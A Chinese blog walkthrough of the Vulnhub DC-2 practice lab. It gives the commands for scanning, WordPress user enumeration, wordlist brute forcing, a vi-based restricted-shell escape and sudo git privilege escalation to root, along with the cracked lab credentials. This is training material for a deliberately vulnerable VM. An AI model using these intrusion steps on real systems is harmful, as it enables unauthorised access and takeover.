首页 > 其他分享 >Vulnhub:DC-2靶机

Vulnhub:DC-2靶机

时间:2023-04-02 17:22:56浏览次数:76  
标签:bin http sudo DC 192.168 usr 靶机 txt Vulnhub

kali:192.168.111.111

靶机:192.168.111.249

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.249

image

wpscan收集目标wordpress用户

wpscan --url http://dc-2 -e u

image

使用cewl收集目标网站信息生成字典

cewl http://dc-2/ -w pass.txt

image

爆破目标wordpress用户密码

wpscan --url http://dc-2 -U user.txt -P ./pass.txt

image

提权

使用用户:tom,密码:parturient,登录目标ssh

image

使用vi编辑器绕过rbash

vi
:set shell=/bin/bash
:shell
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games

image

image

image

image

切换到jerry用户,密码:adipiscing

image

jerry用户sudo权限

image

提权方法:https://gtfobins.github.io/gtfobins/git/#sudo

image

提升为root

sudo -u root git -p help config
!/bin/bash

image

flag

image

标签:bin,http,sudo,DC,192.168,usr,靶机,txt,Vulnhub
From: https://www.cnblogs.com/ctostm/p/17280822.html

相关文章

  • Vulnhub:DC-6靶机
    kali:192.168.111.111靶机:192.168.111.247信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.247访问目标80端口发现重定向到http://wordy,修改/etc/hosts之后访问使用wpscan爆破目标用户wpscan--urlhttp://wordy-eu爆破用的密码字典根据作......
  • 命令行工具 nerdctl
    前面我们介绍了可以使用ctr操作管理containerd镜像容器,但是大家都习惯了使用dockercli,ctr使用起来可能还是不太顺手,为了能够让大家更好的转到containerd上面来,社区提供了一个新的命令行工具:nerdctl。nerdctl是一个与dockercli风格兼容的containerd客户端工具,而且......
  • Vulnhub:Hackme:1靶机
    kali:192.168.111.111靶机:192.168.111.245信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.245访问目标80端口,注册用户登陆后在搜索框位置存在sql注入漏洞利用利用sqlmap获得目标数据库信息sqlmap-o-r./a.txt--batch--level5--risk3......
  • LIDC-IDRI肺结节项目 -- 预处理数据集
    实战参考代码:代码一、路径、参数配置(lung.conf)lidc_dicom_path:LIDC_IDRI数据集原始位置 image_path,mask_path:保存处理后的含有结节的肺部图像和掩码图像路径clean_path_image,clean_path_mask:保存处理后的不含有结节的肺部图像和掩码图像路径meta_path:保存结节元......
  • CloudCanal 落地 DB2 数据迁移同步功能
    简述Db2是一款具有悠久历史的关系型数据库,由IBM公司开发和维护,广泛应用于金融级业务场景。CloudCanal近期提供了Db2为源端的数据迁移同步功能,用户可以便利地将Db2中数据实时同步到其他数据库,实现数据更广泛、更实时的应用。功能介绍目标数据库和能力目标端数据源......
  • DC-DC直流线性可调升压模块高压稳压输出电源5v12v24v48v转0-300V0-500V/0-600V/0-1000
    GRB系列非隔离宽电压输入高电压稳压输出特点 效率高达75%以上 1*2英寸标准封装 单电压输出 可直接焊在PCB上 工作温度:-40℃~+75℃ 阻燃封装,满足UL94-V0要求 温度特性好 电压控制输出,输出电压随控制电压的变化线应用GRB系列模块电源是一种DC-DC升压变换器。该模块电......
  • 三相PFC程序30KW充电桩的500~1000Vdc 0~60A,绝对与实物一致的30KW三相PFC程序
    三相PFC程序30KW充电桩的500~1000Vdc0~60A,绝对与实物一致的30KW三相PFC程序。一、在技术指标参数中,若发现程序中并没有的,全额退款。二、文件资料包括:1、原理图,AltiumDesigner10格式。2、bom表。3、整个CCS工程项目文件,C语言源程序。4、量产机的详细测试报告一份,共27页。一、PFC主......
  • broadcom Ethernet BCM57412 驱动更新记录(dkms方式)
    一背景现场DellR740xd2机器使用网卡Broadcom5741210GbSFP+,固件版本22.21.06.80。bnxt_en.ko内核模块是该网卡的驱动,我们默认的驱动版本为1.8.0,而固件版本22.21.06.80需要1.10.2的driver。本文主要是记录一些操作步骤,后续出现类似驱动过旧的问题可以快速解决。二临时解......
  • android 监听SDCard安装和卸载的代…
    //监听类privatefinalBroadcastReceiversdcardListener=newBroadcastReceiver(){@OverridepublicvoidonReceive(Contextcontext,Intentintent){Stringaction=intent.getAction();Log.d("TAG","sdcar......
  • Livestream Broadcaster:整合在线服务的高清视频编码器
    Livestream是一家提供现场视频流服务的创业公司,近日发布了一个价值495美金的视频编码器Broadcaster,几乎能连接任何摄像头,通过WiFi或任何网无线USB调制解调器将高清视频直接......